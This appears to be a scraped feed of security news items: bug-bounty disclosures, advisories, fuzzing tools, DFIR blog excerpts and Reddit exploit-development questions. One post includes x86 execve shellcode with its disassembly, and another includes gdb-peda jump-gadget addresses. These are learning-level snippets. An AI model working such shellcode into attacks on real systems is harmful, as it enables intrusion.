    Mail.ru disclosed a bug submitted by c1kada: https://hackerone.com/reports/755322
    Reflected XSS in photogallery component on [https://market.av.ru]
    Azbuka Vkusa disclosed a bug submitted by haxta4ok00: https://hackerone.com/reports/988271 - Bounty: $100
    .....
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/505336 - Bounty: $200

  • Open

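    [Security Advisory] Weaver E-Office file upload vulnerability (CNVD-2021-49104)
    Recently, in-the-wild exploitation of the Weaver E-Office file upload vulnerability (CNVD-2021-49104) has been observed online; an attacker can use this vulnerability on affected...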
  • Open

    Paid CTF partner
    Hi, Am doing a couple of CTFs next Sunday and Monday, and I have a shortage in Pwn and reverse fields. If you're interested in helping me through the CTF in these challenges and earning some quick money for each one you help solve, let me know or message me. Note : I can cover all other categories, and know the basics of pwn and reverse but I don't have a team that's why am asking for help. and as I know everyone is busy working or studying, I offered money for each challenge solved so it doesn't become waste of time for whoever wanna help. submitted by /u/riskyg33k [link] [comments]  ( 1 min )
  • Open

    AbuseHumanDB — HackTheBox Write-Up
    In the first post of this blog we are going to examine a Hack The Box challenge called “AbuseHumanDB” and how to carry out a Blind XS Leak + CORS… Continue reading on Medium »  ( 2 min )

  • Open

    Execve shellcode not working
    global _start
    start:
        ; =================== EXECVE ======================
        ; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md
        xor eax, eax
        mov al, 11          ; execve sys call no 11
        xor edx, edx
        ; reverse the command string and store it /bin/bash/0
        push edx            ; push the null of the string
        push 0x686c6c61     ; this shit represent ls -allh in reverse and converted to hex
        push 0x2d20736c
        mov ebx, esp        ; sec arg to the execve is the pointer to the string to execve
        mov ecx, edx        ; mov 3rd arg to execve can be null
        int 0x80
        ;================= EXIT PROGRAM =====================
        ; exit = sys call no 1 -> must go to eax
        ; args to sys call is return code of the program -> must go to ebx
        ;xor eax, eax ; eax = 0
        ;add eax, 1 ; eax = 1
        ;xor ebx, ebx ; ebx = 0
        ;add bl, 4
        ;inc ebx
        ;int 0x80
    see the push edx then next 2 instruction, it's a command ls -allh command this command isn't executing, but /bin//sh is working with this. is there any problem with this. running program, sh is a program too it's working but ls with args.
    ;;;;;; after compiling and dumping with objdump ;;;;;;;;;
        ld: warning: cannot find entry symbol _start; defaulting to 0000000008049000
        f_output: file format elf32-i386
        Disassembly of section .text:
        08049000 :
        8049000: 31 c0 xor eax,eax
        8049002: b0 0b mov al,0xb
        8049004: 31 d2 xor edx,edx
        8049006: 52 push edx
        8049007: 68 61 6c 6c 68 push 0x686c6c61
        804900c: 68 6c 73 20 2d push 0x2d20736c
        8049011: 89 e3 mov ebx,esp
        8049013: 89 d1 mov ecx,edx
        8049015: cd 80 int 0x80
    submitted by /u/dude_sourav [link] [comments]  ( 3 min )
  • Open

    Threat Hunting, IRL
    While I worked for one company, I did a lot of public speaking on the value of threat hunting. During these events, I met a lot of folks who were interested to learn what "threat hunting" was, and how it could be of value to them. I live in a very rural area, on just shy of 19 acres. One neighbor has 15 acres up front and another 20 in the back, and he adjoins a large property with just a trailer. My neighbor on the other side has 19 acres of...just 19 acres. We have animals, as well as more than a few visitors, which makes for a great analogy for threat hunting. Within the borders of my property, we have three horses and a mini-donkey, and we have different paddocks and fields for them. We can restrict them to certain areas, or allow them to roam freely. We do this at different times o…  ( 6 min )

  • Open

    New differential fuzzing tool reveals novel HTTP request smuggling techniques
    Article URL: https://portswigger.net/daily-swig/new-differential-fuzzing-tool-reveals-novel-http-request-smuggling-techniques Comments URL: https://news.ycombinator.com/item?id=29342944 Points: 169 # Comments: 33  ( 4 min )

  • Open

    Long names and muscle memory?
    Hi I have a general programming question, I have tendency to like short and sweet code, but many platforms/libraries have more obtuse names etc. Is it common to build muscle memory when typing out longer names etc.? I noticed Windows land code is pretty obtuse. submitted by /u/WillyRaezer [link] [comments]  ( 1 min )
  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle. READ MORE  ( 6 min )

  • Open

    Tips for DFIR Analysts, pt. V
    Over the years, I've seen DFIR referred to in terms of special operations forces. I've seen incident response teams referred to as "Cyber SEALs", as well as via various other terms. However, when you really look at, incident response is much more akin to the US Army Special Forces, aka "Green Berets"; you have to "parachute in" to a foreign environment, and quickly develop a response capability making use of the customer's staff ("the natives"), all of whom live in a "foreign culture". As such, IR is less about "direct action" and "hostage rescue", and more about "foreign internal defense". Analysis occurs when an analyst applies their knowledge and experience to data, and is usually predicated by a parsing phase. We can learn a great deal about the analyst's level of knowledge and experie…  ( 7 min )
  • Open

    Fuzzing with Scapy: Introduction to Network Protocol Fuzzing (DNS & TCP packets)
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Explaining Basic DOM Clobbering And The Tag
    Or if you’re stuck on PortSwigger’s DOM Clobbering labs Continue reading on Medium »
    Intigriti’s November XSS challenge By @IvarsVids
    This one is by far one of the hardest challenges that I’ve done. The solution is not as intended but it does include some pretty nice… Continue reading on Medium »  ( 5 min )
  • Open

    Source code audit or methodology to find potential Memory corruption in low level language in c/c++ and Assembly.
    Hi , I am beginner to Vulnerability research. Have some experience in ctf and exploit challenges. The problem that I am facing challenges while auditing code either in c/c++ or Assembly manually. I missed many points while searching potential candidates for memory corruption or other logical vulnerabilities. Let’s say I am analysing c++ developed binary in IDA . So I want to know some advice or any tutorials or books to achieve them . Also in windbg crash let’s say there is a crash happened. How to determine which classes of vulnerability it is. .please let me know guys . Thanks. submitted by /u/crypt3r [link] [comments]  ( 2 min )

  • Open

    The "serial offender" #sexually assaulted an innocent minor girl and fled the scene.
    #Sexually assaulted an innocent minor #girl Continue reading on Medium »  ( 1 min )

  • Open

    A bit confused about the jmpcall function in PEDA w/ ASLR but no PIE (x64/Linux)
    Brushing up on some x64 exploitation, and going through some exercises, I am confused by this: When I find jmp esp in a non-PIE enabled binary (using gdb-peda), the location does not seem to change, and is only 3 bytes (with ASLR on). This works fine to execute my shellcode if I pad it out with nulls. What I am confused about is, why is it only 3 bytes? And why is it constant? Is ASLR only randomizing buffer space and not where the .code is loaded? Is an ASLR enabled binary in Windows then the equivalent of Linux ASLR + PIE? Are the 3 bytes just a relative offset?
        gdb-peda$ jmp esp
        0x40061e : jmp rsp
        0x400743 : call rsp
        0x60061e : jmp rsp
        0x600743 : call rsp
    submitted by /u/Bahariasaurus [link] [comments]  ( 2 min )
  • Open

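    [Security Advisory] Metabase sensitive information disclosure vulnerability (CVE-2021-41277)
    Recently, a sensitive information disclosure vulnerability was disclosed in Metabase, with a CVSS3 score as high as 9.9. An attacker can obtain sensitive system information without authentication.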

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows. READ MORE  ( 3 min )
  • Open

    Exploiting Predictable PRNG Seeds (with PwnTools, incl binary patching)
    submitted by /u/_CryptoCat23 [link] [comments]

  • Open

    security researcher assistant
    Hello folks, I am looking for an internship in exploitdev or vulnerability research. I am not looking for any revenue I just need a practical experience. Is there a way to find an internship in such a field as non-american? submitted by /u/botta633 [link] [comments]  ( 1 min )
    Is it still worth it to read The Shellcoder’s Handbook?
    I've been meaning to get into exploit dev and i know that The Shellcoder’s Handbook is recommended but does it still hold up in 2021? submitted by /u/milkshakemahn [link] [comments]  ( 1 min )

  • Open

    Threat actors offer millions for zero-days, developers talk of exploit-as-a-service
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

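    [Security Advisory] Apache ShenYu Admin authentication bypass vulnerability (CVE-2...
    Recently, an authentication bypass vulnerability was disclosed in Apache ShenYu Admin; an attacker can use it to bypass JSON Web Token (JWT) security authentication and directly enter the system's admin backend.  ( 1 min )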
  • Open

    Burp Suite certification prices hacked for Black Friday
    For the very first time, we've decided to join the rest of the world and run a Black Friday offer. Between 16 November 2021 and 30 November 2021, you can buy our Burp Suite Certified Practitioner exam  ( 4 min )

  • Open

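    [Security Advisory] Hadoop Yarn RPC service unauthorized access vulnerability
    Recently, in-the-wild exploitation of an unauthorized access vulnerability in the Hadoop Yarn RPC service has been observed online; an attacker can use it to execute arbitrary commands on affected hosts without authentication.  ( 1 min )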
  • Open

    How to generate millions of files using grammar-based fuzzing (FormatFuzzer)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments. READ MORE  ( 4 min )

  • Open

    Show HN: OpenAPI fuzzer – fuzzing APIs based on OpenAPI specification
    Article URL: https://github.com/matusf/openapi-fuzzer Comments URL: https://news.ycombinator.com/item?id=29231804 Points: 76 # Comments: 22  ( 3 min )
  • Open

    Golden Certificate
    Domain persistence techniques enable red teams that have compromised the domain to operate with the highest level of privileges over a long period. One of… Continue reading → Golden Certificate  ( 5 min )

  • Open

    picoCTF - Here's a Libc Writeup
    submitted by /u/YioUio [link] [comments]

  • Open

    Breaking into exploit dev
    I am a security engineer looking to break into exploit dev. Background: I do not have a CS degree, although I went to school for CS. While in school I was captain of our collegiate hacking team. I held sessions where we practiced (beginner) buffer overflows. While in school I had done research on hardware reverse engineering, focused on medical devices. That got me to present with my peers at our local bsides. I then was able to present at IEEE southeastcon, which got me a job as a security engineer before graduating. -----‐ 1) Is it possible to get into exploit dev without a degree or is it absolutely necessary? 2) should I go the pentester route and then exploit dev? 3) do you see security engineers break into this field or does it tend to be developers? I don't do any software engineering, but I do a lot of tooling in powershell, python, and recently, go. I know C but hardly. 4) should I just shaddup and start learning? I'd assume that's get a better grip on primitives, RoP and C. submitted by /u/xnrkl [link] [comments]  ( 3 min )
    Binary Exploitation (Pwn) Challenge Walkthroughs - HackTheBox x Synack #RedTeamFive CTF
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    Fuzzware: Using Precise MMIO Modeling for Effective Firmware Fuzzing – Usenix
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/scharnowski Comments URL: https://news.ycombinator.com/item?id=29198875 Points: 2 # Comments: 0  ( 2 min )

  • Open

    ClusterFuzzLite: Continuous Fuzzing for All
    Article URL: https://security.googleblog.com/2021/11/clusterfuzzlite-continuous-fuzzing-for.html Comments URL: https://news.ycombinator.com/item?id=29188664 Points: 15 # Comments: 3  ( 3 min )
  • Open

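    [Security Advisory] PAN GlobalProtect Portal memory corruption vulnerability (CVE-...
    Recently, Palo Alto Networks (PAN) published a security advisory fixing a memory corruption vulnerability in the Palo Alto Networks GlobalProtect portal and gateway interfaces. An unauthenticated attack...  ( 1 min )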

  • Open

    Asking Github Copilot to write Fuzzers & Hacking code for me - Hacking with AI
    submitted by /u/pat_ventuzelo [link] [comments]

  • Open

    Nyx-Net: Network Fuzzing with Incremental Snapshots
    Article URL: https://arxiv.org/abs/2111.03013 Comments URL: https://news.ycombinator.com/item?id=29116464 Points: 2 # Comments: 0  ( 2 min )

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.  ( 2 min )

  • Open

    Tips for DFIR Analysts, pt IV
    Context is king, it makes all the difference. You may see something run in EDR telemetry, or in logs, but the context of when it ran in relation to other activities is often critical. Did it occur immediately following a system reboot or a user login? Does it occur repeatedly? Does it occur on other systems? Did it occur in rapid succession with other commands, indicating that perhaps it was scripted? The how and when of the context then leads to attribution. Andy Piazza brings the same thoughts to CTI in his article, "CTI is Better Served with Context". Automation can be a wonderful thing, if you use it, and use it to your advantage. The bad guys do it all the time. Automation means you don't have to remember steps (because you will forget), and it drives consistency and efficiency. Even …  ( 6 min )

  • Open

    Improvements to Burp Suite authenticated scanning
    Burp Suite's authenticated scanning feature enables users to scan privileged areas of target web applications even when a complex login sequence is required. This leverages Burp's browser - using the  ( 4 min )

  • Open

    Autofuzz – Fuzzing Java Without Writing Fuzz Targets
    Article URL: https://fuzz.ci/jazzer/update/2.0 Comments URL: https://news.ycombinator.com/item?id=29013958 Points: 3 # Comments: 1  ( 2 min )

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.  ( 2 min )

  • Open

    An Intro to Fuzzing (a.k.a. Fuzz Testing)
    Article URL: https://labs.bishopfox.com/tech-blog/an-intro-to-fuzzing-aka-fuzz-testing Comments URL: https://news.ycombinator.com/item?id=28988478 Points: 4 # Comments: 0  ( 14 min )

  • Open

    Security Fuzzing Podcast Episode
    Article URL: https://anchor.fm/firo-solutions/episodes/Fuzzing-with-Patrick-Ventuzelo-e197t6c Comments URL: https://news.ycombinator.com/item?id=28977322 Points: 4 # Comments: 0  ( 23 min )

  • Open

    Get Burp Suite certified for free...
    Ready for the challenge? Buy your certification exam now... Burp Suite Certified Practitioner accreditation to enable our users to validate their self-taught skills as web security prac  ( 3 min )

  • Open

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )

  • Open

    Fuzzing-101: learn how to fuzz like a real expert
    Article URL: https://github.com/antonio-morales/Fuzzing101 Comments URL: https://news.ycombinator.com/item?id=28923466 Points: 4 # Comments: 0  ( 3 min )
    The Challenges of Fuzzing 5G Protocols
    Article URL: https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/ Comments URL: https://news.ycombinator.com/item?id=28917943 Points: 5 # Comments: 0  ( 11 min )
    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://github.com/google/fuzzing/blob/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28916409 Points: 1 # Comments: 0  ( 1 min )
    Autofuzz – Java fuzzing without writing fuzz targets
    Article URL: https://blog.code-intelligence.com/autofuzz Comments URL: https://news.ycombinator.com/item?id=28915778 Points: 3 # Comments: 1  ( 2 min )
  • Open

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture. That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly. “If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

  • Open

    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://raw.githubusercontent.com/google/fuzzing/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28909004 Points: 11 # Comments: 0  ( 41 min )
  • Open

    Resource Based Constrained Delegation
    Microsoft in an attempt to provide more flexibility to domain users enabled owner of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )

  • Open

    The Power of Developer-First Security
    Developers want to write good code. Secure code. Tools that optimize developer workflows for handling security issues can take a large burden off security practitioners and make triaging, understanding, prioritizing, and resolving vulnerabilities much easier and faster for the developer. That’s what DevSecOps is all about. One company that has developed such tools is GitLab. […] The post The Power of Developer-First Security appeared first on Security Weekly.  ( 2 min )

  • Open

    Data Exfiltration, Revisited
    I've posted on the topic of data exfiltration before (here, etc.) but often it's a good idea to revisit the topic. After all, it was almost two years ago that we saw the first instance of ransomware threat actors stating publicly that they'd exfiltrated data from systems, using this as a secondary means of extortion. Since then, we've continued to see this tactic used, along with other tertiary means of extortion based on data exfiltration. We've also seen several instances where the threat actor ransom notes have stated that data was exfiltrated but the public "shaming" sites were noticeably empty. As long as I've been involved in what was first referred to as "information security" (later referred to as "cyber security"), data exfiltration has been a concern to one degree or another, even i…  ( 5 min )

  • Open

    Show HN: Prebuilt gotip releases for quickly trying out Go 1.18 fuzzing/generics
    Article URL: https://github.com/clean8s/gotip-built Comments URL: https://news.ycombinator.com/item?id=28810470 Points: 4 # Comments: 0  ( 2 min )

  • Open

    Tips for DFIR Analysts, pt III
    Learn to think critically. Don't take what someone says as gospel, just because they say it. Support findings with data, and clearly communicate the value or significance of something. Be sure to validate your findings, and never rest your findings on a single artifact. Find an entry for a file in the AmCache? Great. But does that mean it was executed on the system? No, it does not...you need to validate execution with other artifacts in the constellation (EDR telemetry, host-based effects such as an application prefetch file, Registry modifications, etc.). Have a thorough process, one that you can add to and extend. Why? Because things are always changing, and there's always something new. If you can automate your process, then so much the better...you're not losing time and enabling…  ( 7 min )
    EDR Bypasses
    During my time in the industry, I've been blessed to have opportunities to engage with a number of different EDR tools/frameworks at different levels. Mike Tanji offered me a look at Carbon Black before carbonblack.com existed, while it still used an on-prem database. I spent a very good deal of time working directly with Secureworks Red Cloak, and I've seen CrowdStrike Falcon and Digital Guardian's framework up close. I've seen the birth and growth of Sysmon, as well as MS's "internal" Process Tracking (which requires an additional Registry modification to record full command lines). I've also seen Nuix Adaptive Security up close (including seeing it used specifically for threat hunting), which rounds out my exposure. So, I haven't seen all tools by any stretch of the imagination, but mor…  ( 6 min )

  • Open

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )

  • Open

    JavaScript Test Case Generator Based on Branch Coverage and Fuzzing
    Article URL: https://slashdot.org/submission/14707493/javascript-test-case-generator-based-on-branch-coverage-and-fuzzing Comments URL: https://news.ycombinator.com/item?id=28745108 Points: 1 # Comments: 1  ( 3 min )

  • Open

    /r/netsec's Q4 2021 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 26 min )

  • Open

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )

  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )

  • Open

    Imposter Syndrome
    Imposter Syndrome. This is something many of us have experienced to one degree or another, at various times. Many have experienced it, some have overcome it, others may not be able to and wonder why. HealthLine tells us, "Imposter feelings represent a conflict between your own self-perception and the way others perceive you." I would modify that slightly to, "...the way we believe others perceive us." Imposter syndrome is something internalized, and has very little to do with the outside world. I wanted to take the opportunity to share with you, the reader, what I've learned over the years about what's really happening in the world when we're having those feelings of imposter syndrome. Perception: I don't want to present at a conference, or ask a question at a conference, because everyone know…  ( 6 min )

  • Open

    Dev.fuzz (fuzzing) merged in Golang tip
    Article URL: https://github.com/golang/go/commit/6e81f78c0f1653ea140e6c8d008700ddad1fa0a5 Comments URL: https://news.ycombinator.com/item?id=28604475 Points: 2 # Comments: 0  ( 7 min )
    Native fuzzing will be in Go 1.18
    Article URL: https://twitter.com/katie_hockman/status/1440082486692773897 Comments URL: https://news.ycombinator.com/item?id=28602233 Points: 1 # Comments: 0  ( 1 min )

  • Open

    Building a More Secure AppDev Process
    Enterprises that integrate security testing into their CI/CD pipeline fix 91.4 percent of new issues, according to a progress report from ShiftLeft. Recent software supply chain attacks illustrate the growing risks businesses, their partners, and customers face. But a recent report suggests better outcomes for those who put security at the heart of app development. Data from […] The post Building a More Secure AppDev Process appeared first on Security Weekly.  ( 2 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )

  • Open

    Distros and RegRipper
    Over the years, every now and then I've taken a look around to try to see where RegRipper is used. I noticed early on that it's included in several security-oriented Linux distros. So, I took the opportunity to compile some of the links I'd found, and I then extended those a bit with some Googling. I will admit, I was a little surprised to see, over time, how far RegRipper has gone, from a "here, look at this" perspective. Not all of the below links are current, some are several years old. As such, they are not the latest and greatest; however, they may still apply and they may still be useful/valuable. RegRipper on Linux (Distros)  Kali, Kali GitLab  SANS SIFT  CAINE   Installing RegRipper on Linux  Install RRv2.8 on Ubuntu  CentOS RegRipper package  Arch Linux   RegRipper Docker Imag…  ( 5 min )
    On Writing DFIR Books, pt II
    Part I of this series kicked things off for us, and honestly I have no idea how long this series will be...I'm just writing the posts without a specific plan or outline for the series. In this case, I opted to take an organic approach, and wanted to see where it would go. Content Okay, so you have an idea for a book, but about...what? You may have a title or general idea, but what's the actual content you intend to write about? Is it more than a couple of paragraphs; can you actually create several solid chapters without having to use a lot of filler and fluff? Back when I was actively writing books, this was something on the forefront of my mind, not only because I was writing books, but later I got a question or two from others along these lines. In short, I write about stuff I know, or …  ( 5 min )

  • Open

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )

  • Open

    Account Persistence – Certificates
    It is not uncommon for organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )

  • Open

    Tips for DFIR Analysts, pt II
    On the heels of my first post with this subject, I thought I'd continue adding tips as they came to mind... I've been engaged with EDR frameworks for some time now. I first became aware of Carbon Black before it was "version 1.0", and before "carbonblack.com" existed. Since then, I've worked for several organizations that developed EDR frameworks (Secureworks, Nuix, CrowdStrike, Digital Guardian), and others that made use of frameworks created by others. I've also been very happy to see the development and growth of Sysmon, and used it in my own testing. One thing I've been acutely aware of is the visibility afforded by EDR frameworks, as well as the extent of that visibility. This is not a knock against these tools...not at all. EDR frameworks and tools are incredibly powerful, but they a…  ( 5 min )
    On Writing DFIR Books, pt I
    During my time in the industry, I've authored 9 books under three imprints, and co-authored a tenth. There, I said it. The first step in addressing a problem is admitting you have one. ;-) Seriously, though, this is simply to say that I have some experience, nothing more. During the latter part of my book writing experience, I saw others who wanted to do the same thing, but ran into a variety of roadblocks, roadblocks I'd long since navigated. As a result, I tried to work with the publisher to create a non-paid liaison role that would help new authors overcome many of those issues, so that a greater portfolio of quality books became available to the industry. By the time I convinced one editor of the viability and benefit of such a program, they had decided to leave their profession, and I…  ( 7 min )

  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »

  • Open

    Web App and API Security Needs to Be Modernized: Here’s How
    Applications are critical for doing business. They are also the weakest links in many an organization’s security chain. Many APIs continue to expose the personally identifiable information of customers, employees and contractors. As OWASP (Open Web Application Security Project) notes on its API Security Project homepage: “By nature, APIs expose application logic and sensitive data […] The post Web App and API Security Needs to Be Modernized: Here’s How appeared first on Security Weekly.  ( 2 min )

  • Open

    Building a Career in CyberSecurity
    There's been a lot of discussion on social media around how to "break into" the cybersecurity field, not only for folks just starting out but also for those looking for a career change. This is not unusual, given what we've seen in the public news media around cyber attacks and ransomware; the idea is that cybersecurity is an exploding career field that is completely "green fields", with an incredible amount of opportunity. Jax Scott recently shared a YouTube video (be sure to comment and subscribe!) where she provides five steps to level up any career, based on her "must read for anyone seeking a career in cybersecurity" blog post. Jax makes a lot of great points, and rather than running through each one and giving my perspective, I thought I'd elaborate a bit on one in particular. Jax's …  ( 4 min )

  • Open

    Tips for DFIR Analysts
    Over the years as a DFIR analyst...first doing digital forensics analysis, and then incorporating that analysis as a component of IR activity...there have been some stunningly simple truths that I've learned, truths that I thought I'd share. Many of these "tips" are truisms that I've seen time and time again, and recognized that they made much more sense and had more value when they were "named". Tips, Thought, and Stuff to Think About Computer systems are a finite, deterministic space. The adversary can only go so far, within memory or on the hard drive. When monitoring computer systems and writing detections, the goal is not write the perfect detection, but rather to force the adversary into a corner, so that no matter what they do, they will trigger something. So, it's a good thing to…  ( 9 min )
  • Open

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )

  • Open

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )

  • Open

    The history of OAST in Burp Suite
    At PortSwigger, we pride ourselves on pushing the boundaries of web security. Just take a peek at some of our researchers' recent and upcoming talks from the likes of Black Hat and DEF CON if you'd li  ( 4 min )
  • Open

    Domain Escalation – PrintNightmare
    Printers are part of every corporate infrastructure, therefore Windows environments have a number of embedded drivers installed. The Print Spooler (spoolsv.exe) service is responsible… Continue reading → Domain Escalation – PrintNightmare  ( 5 min )

  • Open

    HiveNightmare
    The security account manager (SAM) file contains the password hashes of the users on a Windows system. Since it is considered a sensitive file SYSTEM… Continue reading → HiveNightmare  ( 6 min )

  • Open

    “En-pass” — TryHackme Walkthrough (Medium Level CTF)
    In this room we are asked to find the path hidden inside the website. With the information we obtain from the paths we find, solving the machine… Continue reading on Medium »  ( 5 min )

  • Open

    How The Best Defense Gets Better: Part 2
    For many enterprises, incident response is an exercise in chaos. Security teams scramble to figure out how a data breach happened and crash into brick walls as they try to collect information from different departments that are often siloed from everyone else. It doesn’t have to be that way. Advanced security teams have learned that […] The post How The Best Defense Gets Better: Part 2 appeared first on Security Weekly.  ( 2 min )

  • Open

    Posting limits have been enabled on r/opendirectories.
    I'm not going to name any names, but because of many complaints of too many threads being created in a short time period by one user, we have set a limit of 2 5 posts per hour for any one user. This is not for comments, just new posts. Let us know if the limit is set too high or too low and we can adjust it if enough people agree. thanks, Your Loving Mods. edit: after reading the comments, the posting rate has been adjusted to 5 posts per user per hour. submitted by /u/MrDorkESQ [link] [comments]  ( 4 min )

  • Open

    HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part Five: FuzzCON
    Welcome to the DEFCON 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »  ( 8 min )
  • Open

    Universal Privilege Escalation and Persistence – Printer
    The Print Spooler is responsible to manage and process printer jobs. It runs as a service with SYSTEM level privileges on windows environments. Abuse of… Continue reading → Universal Privilege Escalation and Persistence – Printer  ( 5 min )

  • Open

    Introducing the Burp Suite Certified Practitioner accreditation
    We launched the Web Security Academy in April 2019, as a means of providing free training and learning materials for security professionals. We now have 200 labs, and last year the Web Security Academ  ( 4 min )

  • Open

    Diversifying Cybersecurity Talent Through Aptitude Testing
    With a shortage of four million cybersecurity workers, we need to get more creative in identifying non-technical skills among potential candidates that can be applied to the cybersecurity realm. One way is to test them for aptitude and personality traits, like the career planning tests I took in college. That’s what the University of Maryland did […] The post Diversifying Cybersecurity Talent Through Aptitude Testing appeared first on Security Weekly.  ( 2 min )

  • Open

    Burp Suite roadmap update: July 2021
    Apparently we're halfway through 2021 already (where does the time go?). Here's an update on what we've added to our products so far this year, as well as some exciting new features we're adding to ou  ( 5 min )

  • Open

    Black Hat USA 2021: PortSwigger's latest research to be unveiled
    Two years ago, PortSwigger's director of research James Kettle presented "HTTP Desync Attacks" on-stage at BlackHat USA and kicked off a wave of request smuggling, but at that time HTTP/2 escaped seri  ( 4 min )

  • Open

    Introducing DOM Invader: DOM XSS just got a whole lot easier to find
    Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp  ( 7 min )
  • Open

    Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments
    In 2020, cyber criminals used cloud applications, the cover of a pandemic, and a newly embraced work-from-home culture to serve up ransomware, steal data, and disrupt how companies do business. The year is over, but the challenges and risks remain.  How do we prevent these criminals from injecting chaos into our hybrid work environments? As […] The post Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments appeared first on Security Weekly.  ( 2 min )

  • Open

    How the Best Defense Gets Better
    Security starts before detection and response, but many organizations focus there first. Mature security teams understand the importance of identification and protection.  Establishing good cyber hygiene and taking proactive measures to secure themselves against the ever-increasing threat landscape is a critical first step in a holistic security program.  How should organizations build a holistic security […] The post How the Best Defense Gets Better appeared first on Security Weekly.  ( 2 min )

  • Open

    What We Know About The Ransomware Economy
